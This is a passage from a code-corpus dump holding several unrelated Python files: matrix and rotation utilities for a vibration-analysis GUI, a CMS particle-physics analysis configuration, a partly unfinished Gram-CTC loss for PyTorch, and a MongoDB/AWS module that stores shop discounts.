(N,3,3)\n \n Returns\n -------\n out: numpy.ndarray\n inverse matrix\n '''\n \n b = 1/( A[:,0,0]*A[:,1,1]*A[:,2,2] + A[:,0,1]*A[:,1,2]*A[:,2,0] +\n A[:,0,2]*A[:,1,0]*A[:,2,1] - A[:,0,2]*A[:,1,1]*A[:,2,0] -\n A[:,0,1]*A[:,1,0]*A[:,2,2] - A[:,0,0]*A[:,1,2]*A[:,2,1] )\n\n b11 = A[:,1,1]*A[:,2,2] - A[:,1,2]*A[:,2,1]\n b12 = -( A[:,0,1]*A[:,2,2] - A[:,0,2]*A[:,2,1] )\n b13 = A[:,0,1]*A[:,1,2] - A[:,0,2]*A[:,1,1]\n \n b21 = -( A[:,1,0]*A[:,2,2] - A[:,1,2]*A[:,2,0] )\n b22 = A[:,0,0]*A[:,2,2] - A[:,0,2]*A[:,2,0]\n b23 = -( A[:,0,0]*A[:,1,2] - A[:,0,2]*A[:,1,0] )\n\n b31 = A[:,1,0]*A[:,2,1] - A[:,1,1]*A[:,2,0]\n b32 = -( A[:,0,0]*A[:,2,1] - A[:,0,1]*A[:,2,0] )\n b33 = A[:,0,0]*A[:,1,1] - A[:,0,1]*A[:,1,0]\n\n data = (b*np.array([[b11,b12,b13],[b21,b22,b23],[b31,b32,b33]]))\n invA = np.transpose(data, axes=[2,0,1])\n \n return invA\n\ndef inverse_matrix_3x3(A):\n ''' \n Given a 3x3 matrix, compute its inverse faster than\n numpy's default function.\n\n Parameters\n ----------\n A: numpy.ndarray\n Matrix of shape (3,3)\n \n Returns\n -------\n out: numpy.ndarray\n inverse matrix\n\n '''\n \n b = 1/( A[0,0]*A[1,1]*A[2,2] + A[0,1]*A[1,2]*A[2,0] +\n A[0,2]*A[1,0]*A[2,1] - A[0,2]*A[1,1]*A[2,0] -\n A[0,1]*A[1,0]*A[2,2] - A[0,0]*A[1,2]*A[2,1] )\n\n b11 = A[1,1]*A[2,2] - A[1,2]*A[2,1]\n b12 = -( A[0,1]*A[2,2] - A[0,2]*A[2,1] )\n b13 = A[0,1]*A[1,2] - A[0,2]*A[1,1]\n \n b21 = -( A[1,0]*A[2,2] - A[1,2]*A[2,0] )\n b22 = A[0,0]*A[2,2] - A[0,2]*A[2,0]\n b23 = -( A[0,0]*A[1,2] - A[0,2]*A[1,0] )\n\n b31 = A[1,0]*A[2,1] - A[1,1]*A[2,0]\n b32 = -( A[0,0]*A[2,1] - A[0,1]*A[2,0] )\n b33 = A[0,0]*A[1,1] - A[0,1]*A[1,0]\n\n invA = b*np.array([[b11,b12,b13],[b21,b22,b23],[b31,b32,b33]])\n \n return invA\n\ndef _transformation_matrix_3x3(delta_x, delta_y, delta_z, gamma=0):\n ''' \n This method returns the rotation matrix of an element \n based on its spatial position. \n \n Parameters\n ----------\n delta_x: int, float\n value in meters\n \n delta_y: int, float\n value in meters\n\n delta_z: int, float\n value in meters\n\n Returns\n -------\n out: numpy.ndarray(3,3)\n rotation matrix\n\n '''\n\n L_ = np.sqrt(delta_x**2 + delta_y**2)\n L = np.sqrt(delta_x**2 + delta_y**2 + delta_z**2)\n\n cossine_epsilon = L_ / L\n sine_epsilon = - delta_z / L\n \n if L_ > 0.0001*L:\n sine_delta = delta_y/L_\n cossine_delta = delta_x/L_\n else:\n sine_delta = 0\n cossine_delta = 1\n \n cossine_gamma = np.cos(gamma)\n sine_gamma = np.sin(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. pg 677)\n rotation_matrix = np.array([ [ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon ], \n [ cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma ],\n [ cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ] ]) \n\n return rotation_matrix\n\n\ndef _transformation_matrix_3x3xN(delta_x, delta_y, delta_z, gamma=0):\n ''' \n This method returns the rotation matrices to a set of N elements \n based on their spatial positions. \n \n Parameters\n ----------\n delta_x: numpy.ndarray\n values in meters\n \n delta_y: numpy.ndarray\n values in meters\n\n delta_z: numpy.ndarray\n values in meters\n\n Returns\n -------\n out: numpy.ndarray(N,3,3)\n rotation matrix\n\n '''\n\n number_elements = len(delta_x)\n L_ = np.sqrt(delta_x**2 + delta_y**2)\n L = np.sqrt(delta_x**2 + delta_y**2 + delta_z**2)\n \n cossine_gamma = np.cos(gamma)\n sine_gamma = np.sin(gamma)\n\n sine_delta = np.zeros(number_elements, dtype=float)\n cossine_delta = np.zeros(number_elements, dtype=float)\n\n for i in range(number_elements):\n\n if L_[i] > 0.0001*L[i]:\n sine_delta[i] = delta_y[i]/L_[i]\n cossine_delta[i] = delta_x[i]/L_[i]\n else:\n sine_delta[i] = 0\n cossine_delta[i] = 1\n\n cossine_epsilon = L_ / L\n sine_epsilon = - delta_z / L\n \n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.T.reshape(-1,3,3)\n\ndef _transformation_matrix_3x3_by_angles(gamma, epsilon, delta):\n ''' \n This method returns the rotation matrix of an element based on \n the angles of rotations gamma, epsilon and delta. \n \n Parameters\n ----------\n gamma: int, float\n values in radians\n \n epsilon: int, float\n values in radians\n\n delta: int, float\n values in radians\n\n Returns\n -------\n out: numpy.ndarray(3,3)\n rotation matrix\n\n '''\n\n sine_delta = np.sin(delta)\n cossine_delta = np.cos(delta)\n\n sine_epsilon = np.sin(epsilon)\n cossine_epsilon = np.cos(epsilon)\n\n sine_gamma = np.sin(gamma)\n cossine_gamma = np.cos(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.reshape(3,3)\n\ndef _transformation_matrix_Nx3x3_by_angles(gamma, epsilon, delta):\n ''' \n This method returns the rotation matrices to a set of N elements \n based on the angles of rotations gamma, epsilon and delta. \n \n Parameters\n ----------\n gamma: numpy.ndarray\n values in radians\n \n epsilon: numpy.ndarray\n values in radians\n\n delta: numpy.ndarray\n values in radians\n\n Returns\n -------\n out: numpy.ndarray(N,3,3)\n rotation matrix\n\n '''\n\n sine_delta = np.sin(delta)\n cossine_delta = np.cos(delta)\n\n sine_epsilon = np.sin(epsilon)\n cossine_epsilon = np.cos(epsilon)\n\n sine_gamma = np.sin(gamma)\n cossine_gamma = np.cos(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.T.reshape(-1,3,3)\n\n\ndef error( msg, title = \" ERROR \"):\n '''\n PyQt5 error message.\n\n Parameters\n ----------\n msg: str\n text to be displayed.\n\n title: str\n window title.\n '''\n\n msg_box = QMessageBox()\n msg_box.setWindowFlags(Qt.WindowStaysOnTopHint)\n # msg_box.setWindowModality(Qt.WindowModal)\n msg_box.setIcon(QMessageBox.Critical)\n msg_box.setText(msg)\n msg_box.setWindowTitle(title)\n msg_box.exec_()\n\ndef info_messages(msg, title = \" INFORMATION \"):\n '''\n PyQt5 info message.\n\n Parameters\n ----------\n msg: str\n text to be displayed.\n\n title: str\n window title.\n '''\n\n msg_box = QMessageBox()\n msg_box.setWindowFlags(Qt.WindowStaysOnTopHint)\n # msg_box.setWindowModality(Qt.WindowModal)\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setText(msg)\n msg_box.setWindowTitle(title)\n msg_box.exec_()\n\ndef remove_bc_from_file(entries_typed, path, keys_to_remove, message):\n try:\n\n bc_removed = False\n config = configparser.ConfigParser()\n config.read(path)\n\n for entry in entries_typed: \n entry_id = str(entry)\n\n if entry_id in config.sections():\n keys = list(config[entry_id].keys())\n\n for key_to_remove in keys_to_remove:\n if key_to_remove in keys:\n bc_removed = True\n config.remove_option(section=entry_id, option=key_to_remove)\n if list(config[entry_id].keys())==[]:\n config.remove_section(section=entry_id)\n \n if bc_removed:\n with open(path, 'w') as config_file:\n config.write(config_file)\n\n if message is not None and bc_removed:\n PrintMessageInput([\"Error while removing BC from file\" ,message, \"ERROR\"])\n\n except Exception as log_error:\n PrintMessageInput([\"Error while removing BC from file\" ,str(log_error), \"ERROR\"])\n\n\ndef getColorRGB(color):\n temp = color[1:-1] #Remove \"[ ]\"\n tokens = temp.split(',')\n return list(map(int, tokens))\n\ndef sparse_is_equal(a, b):\n '''\n Function to check if two scipy.sparse matrices are equal. \n \n Notes\n -----\n Because of implementation reasons, the right way to do this is checking \n the differences, not the similarities.\n\n Parameters\n ----------\n a: scipy.sparse\n A sparce matrix.\n\n b: scipy.sparse\n Another sparce matrix.\n\n Returns\n -------\n out: True if the matrices are equal, else False.\n \n Raises\n ------\n Type Error\n If matrices are not sparse.\n '''\n\n if not (issparse(a) and issparse(b)):\n raise TypeError('a and b should be sparse matrices')\n\n diference = a != b\n if isinstance(diference, bool):\n return not diference\n\n if issparse(diference):\n return diference.nnz == 0\n\ndef get_new_path(path, name):\n if \"\\\\\" in path:\n new_path = '{}\\\\{}'.format(path, name)\n elif \"/\" in path:\n new_path = '{}/{}'.format(path, name)\n return new_path\n\ndef get_linear_distribution(x_initial, x_final, N):\n n = np.arange(N)/(N-1)\n return (x_final-x_initial)*n + x_initial\n\ndef create_new_folder(path, folder_name):\n folder_path = get_new_path(path, folder_name)\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n return folder_path\n\ndef check_is_there_a_group_of_elements_inside_list_elements(input_list):\n ord_list = np.sort(input_list)\n _value = ord_list[0]\n list_i = [_value]\n list_of_lists = []\n for value in ord_list[1:]:\n if value == _value + 1:\n list_i.append(value)\n else:\n temp_list = list_i.copy()\n list_of_lists.append(temp_list)\n list_i = [value]\n _value = value\n list_of_lists.append(list_i)\n return list_of_lists","sub_path":"pulse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372694850","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"CumuDiff\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.GeometryDB_cff')\nprocess.load(\"TrackingTools/TransientTrack/TransientTrackBuilder_cfi\")\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 100\n\nfrom Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, '75X_dataRun2_v13', '')\n\nprocess.options = cms.untracked.PSet(\n SkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n\tfileNames = cms.untracked.vstring(\"file:/afs/cern.ch/user/q/qwang/work/cleanroomRun2/Ana/data/ppReco_GMOV0.root\"),\n\tsecondaryFileNames = cms.untracked.vstring(\n\t\t'file:/afs/cern.ch/user/q/qwang/work/cleanroomRun2/Ana/data/ppReco.root'\n\t\t),\n)\n\n\nimport HLTrigger.HLTfilters.hltHighLevel_cfi\n\nprocess.hltMB = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()\nprocess.hltMB.HLTPaths = [\n\t\"HLT_HIL1MinimumBiasHF2AND*\",\n\t\"HLT_HIL1MinimumBiasHF1AND*\",\n]\nprocess.hltMB.andOr = cms.bool(True)\nprocess.hltMB.throw = cms.bool(False)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('cumu.root')\n)\n\n\nprocess.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\n\nprocess.primaryVertexFilter.src = cms.InputTag(\"GMOVertex\")\n\nprocess.load('RecoHI.HiCentralityAlgos.CentralityFilter_cfi')\nprocess.NoffFilter = process.centralityFilter.clone(\n\tselectedBins = cms.vint32(\n\t\t*range(320)\n\t\t),\n\tBinLabel = cms.InputTag(\"Noff\")\n\t)\n\nprocess.eventSelection = cms.Sequence(\n process.hfCoincFilter3\n# + process.primaryVertexFilter\n# + process.clusterCompatibilityFilter\n)\n\n\nprocess.QWV0EventKs = cms.EDProducer('QWV0VectProducer'\n\t\t, vertexSrc = cms.untracked.InputTag('GMOVertex')\n\t\t, trackSrc = cms.untracked.InputTag('generalTracks')\n\t\t, V0Src = cms.untracked.InputTag('generalV0CandidatesNew', 'Kshort')\n\t\t, daughter_cuts = cms.untracked.PSet(\n\t\t\t)\n\t\t, cuts = cms.untracked.VPSet(\n\t\t\tcms.untracked.PSet(\n\t\t\t\tMassmin = cms.untracked.double(0.467)\n\t\t\t\t, Massmax = cms.untracked.double(0.523)\n\t\t\t\t, DecayXYZMin = cms.untracked.double(5.0)\n\t\t\t\t, ThetaXYZMin = cms.untracked.double(0.999)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\nprocess.QWV0EventLambda = cms.EDProducer('QWV0VectProducer'\n\t\t, vertexSrc = cms.untracked.InputTag('GMOVertex')\n\t\t, trackSrc = cms.untracked.InputTag('generalTracks')\n\t\t, V0Src = cms.untracked.InputTag('generalV0CandidatesNew', 'Kshort')\n\t\t, daughter_cuts = cms.untracked.PSet(\n\t\t\t)\n\t\t, cuts = cms.untracked.VPSet(\n\t\t\tcms.untracked.PSet(\n\t\t\t\tMassmin = cms.untracked.double(1.11)\n\t\t\t\t, Massmax = cms.untracked.double(1.123)\n\t\t\t\t, DecayXYZMin = cms.untracked.double(5.0)\n\t\t\t\t, ThetaXYZMin = cms.untracked.double(0.999)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n#process.QWV0EventV0 = process.QWV0EventLambda.clone()\nprocess.QWV0EventV0 = process.QWV0EventKs.clone()\n\nprocess.load('PbPb_HIMB5_ppReco_eff')\nprocess.Noff.vertexSrc = cms.untracked.InputTag('GMOVertex')\nprocess.QWEvent.vertexSrc = cms.untracked.InputTag('GMOVertex')\nprocess.QWEvent.ptMax = cms.untracked.double(100)\n\nprocess.QWCumuDiff = cms.EDAnalyzer('QWCumuDiff',\n\t\ttrackSet = cms.untracked.PSet(\n\t\t\tEta = cms.untracked.InputTag('QWEvent', 'eta'),\n\t\t\tPhi = cms.untracked.InputTag('QWEvent', 'phi'),\n\t\t\tRef = cms.untracked.InputTag('QWEvent', 'ref'),\n\t\t\tPt = cms.untracked.InputTag('QWEvent', 'pt'),\n\t\t\tWeight = cms.untracked.InputTag('QWEvent', 'weight'),\n\t\t\t),\n\t\tsigSet = cms.untracked.PSet(\n\t\t\tEta = cms.untracked.InputTag('QWV0EventV0', 'eta'),\n\t\t\tPhi = cms.untracked.InputTag('QWV0EventV0', 'phi'),\n\t\t\tRef = cms.untracked.InputTag('QWV0EventV0', 'Refs'),\n\t\t\tPt = cms.untracked.InputTag('QWV0EventV0', 'pt'),\n\t\t\tWeight = cms.untracked.InputTag('QWV0EventV0', 'weight'),\n\t\t\t),\n\t\tvertexZ = cms.untracked.InputTag('QWEvent', \"vz\"),\n\t\tptBin = cms.untracked.vdouble(0.1, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0, 12.0, 16.0, 20.0, 30.0, 40.0, 100.0),\n\t\tcentrality = cms.untracked.InputTag('Noff')\n\t\t)\n\n\nprocess.vectV0Mass = cms.EDAnalyzer('QWVectorAnalyzer',\n\t\tsrc = cms.untracked.InputTag(\"QWV0EventV0\", \"mass\"),\n\t\thNbins = cms.untracked.int32(100),\n\t\thstart = cms.untracked.double(0),\n\t\thend = cms.untracked.double(100),\n\t\tcNbins = cms.untracked.int32(100),\n\t\tcstart = cms.untracked.double(.40),\n\t\tcend = cms.untracked.double(0.60),\n\t\t)\n\n## Lambda\n#process.vectV0Mass.cstart = cms.untracked.double(1.0)\n#process.vectV0Mass.cend = cms.untracked.double(1.2)\n\nprocess.vectPt.cNbins = cms.untracked.int32(4000)\nprocess.vectPt.cend = cms.untracked.double(40)\nprocess.vectPtW.cNbins = cms.untracked.int32(4000)\nprocess.vectPtW.cend = cms.untracked.double(40)\n\nprocess.vectPhiV0 = process.vectPhi.clone(src = cms.untracked.InputTag('QWV0EventV0', 'phi'))\nprocess.vectEtaV0 = process.vectEta.clone(src = cms.untracked.InputTag('QWV0EventV0', 'eta'))\nprocess.vectPtV0 = process.vectPt.clone(src = cms.untracked.InputTag('QWV0EventV0', 'pt'))\n\n\nprocess.ana = cms.Path(process.eventSelection * process.makeEvent * process.NoffFilter * process.QWV0EventV0 * process.QWCumuDiff * process.vectMonW * process.vectV0Mass * process.vectPhiV0 * process.vectEtaV0 * process.vectPtV0)\n\nprocess.RECO = cms.OutputModule(\"PoolOutputModule\",\n\t\toutputCommands = cms.untracked.vstring('keep *'),\n\t\tSelectEvents = cms.untracked.PSet(\n\t\t\tSelectEvents = cms.vstring('ana')\n\t\t\t),\n\t\tfileName = cms.untracked.string('recoV0.root')\n\t\t)\n\nprocess.out = cms.EndPath(process.RECO)\n\n\nprocess.schedule = cms.Schedule(\n\tprocess.ana,\n#\tprocess.out\n)\n","sub_path":"test/qwcumu_PbPb15_ppReco_GMOKs_eff_v1.py","file_name":"qwcumu_PbPb15_ppReco_GMOKs_eff_v1.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"282095668","text":"import queue\nimport threading\n\nimport numba\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function, Variable\n\nfrom .utils import log_sum_exp\n\n\n@numba.jit(nogil=True)\ndef _gram_ctc_loss(logits, targets, grams, blank_idx=0):\n \"\"\"\n http://www.cs.toronto.edu/~graves/icml_2006.pdf\n :param logits: numpy array, sequence_len * num_labels\n :param targets: numpy array, target labels\n :param blank: blank index\n :return: loss (float), gradient (same shape as logits)\n \"\"\"\n targets_len = targets.shape[0]\n prediction_len = logits.shape[0]\n num_labels = logits.shape[1]\n\n max_gram_length = len(grams.shape)\n if max_gram_length >= 4:\n raise NotImplementedError\n\n # num_basic_labels = grams.shape[0]\n\n extended_targets = np.ones(targets_len * (max_gram_length + 1) + 1, dtype=np.int64) * blank_idx\n extended_targets_num_grams = np.ones(targets_len * (max_gram_length + 1) + 1, dtype=np.int64)\n\n extended_targets_len = 0\n for i in range(targets_len):\n extended_targets_len += 1 # here was blank, it is in just in extended_targets\n extended_targets[extended_targets_len] = targets[i]\n extended_targets_len += 1\n for start in range(i - 1, max(-1, i - max_gram_length), -1):\n gram_indices = tuple(targets[j] for j in range(start, i + 1)) \\\n + tuple(\n 0 for _ in range(max_gram_length - (i - start + 1))) # can't use dict because of numba limitations\n current_ngram = grams[gram_indices]\n if current_ngram > 0: # if such ngram exists\n extended_targets[extended_targets_len] = current_ngram\n extended_targets_num_grams[extended_targets_len] = i - start + 1\n extended_targets_len += 1\n extended_targets_len += 1 # last blank\n\n # alpha and beta computation\n\n # forward - alpha\n log_alpha = np.zeros((extended_targets_len, prediction_len))\n log_alpha[:] = -np.inf # numba bugfix instead of log_alpha.fill(-np.inf)\n if prediction_len > 1 or extended_targets_len == 1:\n log_alpha[0, 0] = logits[0, extended_targets[0]]\n if extended_targets_len > 1:\n log_alpha[1, 0] = logits[0, extended_targets[1]]\n\n last_blank_indices = np.zeros(max_gram_length, dtype=np.int64)\n for t in range(1, prediction_len): # timesteps\n start = max(0, extended_targets_len - 2 * (prediction_len - t) - max_gram_length + 1) # addition for ngrams?\n end = min(t * 2 + 2 + max_gram_length - 1, extended_targets_len) # ???\n log_alpha[start:end, t] = log_alpha[start:end, t - 1]\n last_blank_indices[:] = -1\n for j in range(start, end):\n current_label = extended_targets[j]\n if current_label == blank_idx:\n if last_blank_indices[-1] >= 0:\n for k in range(last_blank_indices[-1] + 1, j):\n log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[k, t - 1])\n last_blank_indices[:-1] = last_blank_indices[1:] # shift\n last_blank_indices[-1] = j\n else: # current_label != blank_idx\n raise NotImplementedError\n if j - 2 >= 0 and extended_targets[j - 2] != current_label:\n log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[j - 2, t - 1])\n log_alpha[j, t] += logits[t, current_label]\n\n loss_forward = log_alpha[extended_targets_len - 1, prediction_len - 1]\n\n if extended_targets_len > 1:\n i = extended_targets_len - 2\n while i >= 0 and extended_targets[i] != blank_idx:\n loss_forward = log_sum_exp(loss_forward, log_alpha[i, prediction_len - 1])\n i -= 1\n\n # backward - beta\n log_beta = np.zeros((extended_targets_len, prediction_len))\n log_beta[:] = -np.inf # numba bugfix instead of log_beta.fill(-np.inf)\n if prediction_len > 1 or extended_targets_len == 1:\n log_beta[extended_targets_len - 1, prediction_len - 1] = 0\n if extended_targets_len > 1:\n raise NotImplementedError # last ngrams find?\n log_beta[extended_targets_len - 2, prediction_len - 1] = 0\n for t in range(prediction_len - 2, -1, -1): # timesteps\n start = max(0, extended_targets_len - 2 * (prediction_len - t))\n end = min(t * 2 + 2, extended_targets_len)\n for j in range(start, end):\n current_label = extended_targets[j]\n log_beta[j, t] = log_beta[j, t + 1] + logits[t + 1, extended_targets[j]]\n if j < extended_targets_len - 1:\n log_beta[j, t] = log_sum_exp(log_beta[j, t],\n log_beta[j + 1, t + 1] + logits[t + 1, extended_targets[j + 1]])\n if current_label != blank_idx and j + 2 < extended_targets_len and extended_targets[\n j + 2] != current_label:\n log_beta[j, t] = log_sum_exp(log_beta[j, t], log_beta[j + 2, t + 1] + logits[\n t + 1, extended_targets[j + 2]])\n\n alpha_beta = log_alpha + log_beta\n\n prob_sum = np.zeros((prediction_len, num_labels))\n prob_sum[:] = -np.inf\n for i in range(extended_targets_len):\n current_label = extended_targets[i]\n prob_sum[:, current_label] = log_sum_exp(prob_sum[:, current_label], alpha_beta[i, :])\n negative_term = prob_sum - loss_forward\n grad = np.exp(logits) - np.exp(negative_term)\n\n return -loss_forward, grad\n\n\ndef _gram_ctc_3d_loss(logits, targets, logits_lengths, targets_length, grams, blank_idx=0):\n batch_size = len(targets_length)\n grads = np.zeros_like(logits)\n\n losses = np.zeros(batch_size)\n\n # parallel computation, threading - because gil is released with numba.jin(nogil=True)\n que = queue.Queue()\n threads = []\n for i in range(batch_size):\n t = threading.Thread(target=lambda q, i, *args: q.put((i, _gram_ctc_loss(*args))),\n args=(que, i, logits[i, :logits_lengths[i], :],\n targets[i, :targets_length[i]], grams, blank_idx))\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n\n while not que.empty():\n i, (loss, grad) = que.get()\n grads[i, :logits_lengths[i], :] = grad\n losses[i] = loss\n\n # iterative computation\n # for i in range(batch_size):\n # loss, grad = _ctc_loss(inputs[:input_sizes[i], i, :], targets_flat[targets_sizes_start[i]:targets_sizes_end[i]])\n # grads[:input_sizes[i], i, :] = grad\n # losses[i] = loss\n\n return losses, grads\n\n\nclass GramCTCLossFunction(Function):\n @staticmethod\n def forward(ctx, logits, targets, logits_lengths, targets_lengths, grams, blank_idx=0):\n # inputs: expected shape of seqLength x batchSize x alphabet_size, after logsoftmax!\n loss, grads = _gram_ctc_3d_loss(\n logits.cpu().numpy(), targets.cpu().numpy(),\n logits_lengths.cpu().numpy(), targets_lengths.cpu().numpy(),\n grams, blank_idx)\n ctx.grads = torch.FloatTensor(grads) # save for backward not works!\n if logits.is_cuda:\n return torch.FloatTensor(loss).cuda(logits.get_device())\n return torch.FloatTensor(loss)\n\n @staticmethod\n def backward(ctx, grad_output):\n \"\"\"\n :param grad_output: [batch_size]\n :return:\n \"\"\"\n loss_grads = Variable(ctx.grads)\n if grad_output.is_cuda:\n loss_grads = loss_grads.cuda(grad_output.get_device())\n grad = loss_grads.contiguous() * grad_output.contiguous().view(-1, 1, 1)\n return grad, None, None, None, None, None\n\n\nif __name__ == \"__main__\":\n from torch.autograd import gradcheck\n\n # gradchek takes a tuple of tensor as input, check if your gradient\n # evaluated with these tensors are close enough to numerical\n # approximations and returns True if they all verify this condition.\n # alphabet_size = 30\n # max_targets_len = 50\n # max_sequence_len = 100\n # batch_size = 2\n\n alphabet_size = 5\n max_targets_len = 100\n max_sequence_len = 200\n batch_size = 2\n\n np.random.seed(523)\n\n targets_sizes = np.random.randint(1, max_targets_len + 1, batch_size)\n inputs_sizes = targets_sizes + np.random.randint(0, (max_sequence_len - max_targets_len) + 1, batch_size)\n inputs = np.random.randn(max_sequence_len, batch_size, alphabet_size + 1)\n # expected shape seqLength x batchSize x alphabet_size\n\n sum_target_len = np.sum(targets_sizes)\n targets_flat = (1 + np.random.rand(sum_target_len) * alphabet_size).astype(np.int64)\n # print(targets_flat, inputs.shape, inputs)\n\n input = (nn.LogSoftmax(dim=2)(Variable(torch.FloatTensor(inputs), requires_grad=True)),\n Variable(torch.LongTensor(targets_flat), requires_grad=False),\n Variable(torch.LongTensor(inputs_sizes), requires_grad=False),\n Variable(torch.LongTensor(targets_sizes), requires_grad=False))\n print(GramCTCLossFunction.apply(*input).data[0])\n test = gradcheck(GramCTCLossFunction.apply, input) # , atol=1e-5, rtol=1e-5)\n print(test)\n","sub_path":"pytorch_end2end/functions/gram_ctc_loss.py","file_name":"gram_ctc_loss.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349912224","text":"import pymongo\nimport boto3\nimport json\nfrom config import BUCKET_NAME, AWS_ACCESS_KEY, AWS_SECRET_KEY, TOPIC_ARN\nfrom aws_storage import get_image_link_s3\n\n# DATABASE_HOST = 'localhost'\nDATABASE_HOST = '18.220.30.245'\nDATABASE_INDEX = 27017\n\n\ndef get_database():\n client = pymongo.MongoClient(DATABASE_HOST, DATABASE_INDEX)\n db = client.test_scrapers\n coll = db.mall_sales\n db.mall_sales_second.drop()\n coll_second = db.mall_sales_second\n # return coll\n return coll_second\n\n\ndef adding_second_discount_to_db(coll, discount_info, mall_name):\n\n search_discount = coll.find_one(\n {'discount_description': discount_info['discount_description'],\n 'shop_name': discount_info['shop_name']}\n )\n\n if not search_discount:\n print(\"Adding new discount: {}\".format((discount_info.get('shop_name'))))\n mall_name.update(discount_info)\n if mall_name.get('_id'):\n del mall_name['_id']\n coll.save(mall_name)\n\n get_discount = coll.find_one({'_id': mall_name['_id']})\n\n if get_discount['discount_image']:\n\n data = {'link': get_discount['discount_image'], 'id': str(get_discount['_id'])}\n\n client = boto3.client(\n 'sns',\n aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name='us-east-2'\n )\n\n client.publish(TopicArn=TOPIC_ARN, Message=json.dumps(data))\n else:\n\n print(\"Discount already exists {}\".format(discount_info.get('shop_name')))\n\n # finished_mall_discount = coll.find({'shop_name': discount_info.get('shop_name')})\n\n finished_mall_discount = coll.find({'shop_name': discount_info.get('shop_name')}).next()\n\n return finished_mall_discount\n\n\ndef adding_new_discount_to_db(coll, discount_info, mall_name):\n\n serch_discount = coll.aggregate(\n [\n {\"$unwind\": \"$discount\"},\n {'$match': {\n 'discount.discount_description': discount_info['discount_description'],\n 'discount.date_start': discount_info['date_start'],\n 'discount.date_end': discount_info['date_end']\n }\n }\n ]\n )\n\n try:\n serch_discount.next()\n print(\"Discount already exists {}\".format(discount_info.get('shop_name')))\n\n except StopIteration:\n\n coll.update({'mall_name': mall_name}, {\"$push\": {\"discount\": discount_info}})\n print(\"Adding new discount: {}\".format(discount_info))\n\n finished_mall_discount = coll.find({'mall_name': mall_name}).next()\n\n return finished_mall_discount\n","sub_path":"api_scraper/scrapers_views/db_info_and_adding.py","file_name":"db_info_and_adding.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"142611381","text":"from configparser import ConfigParser\nimport 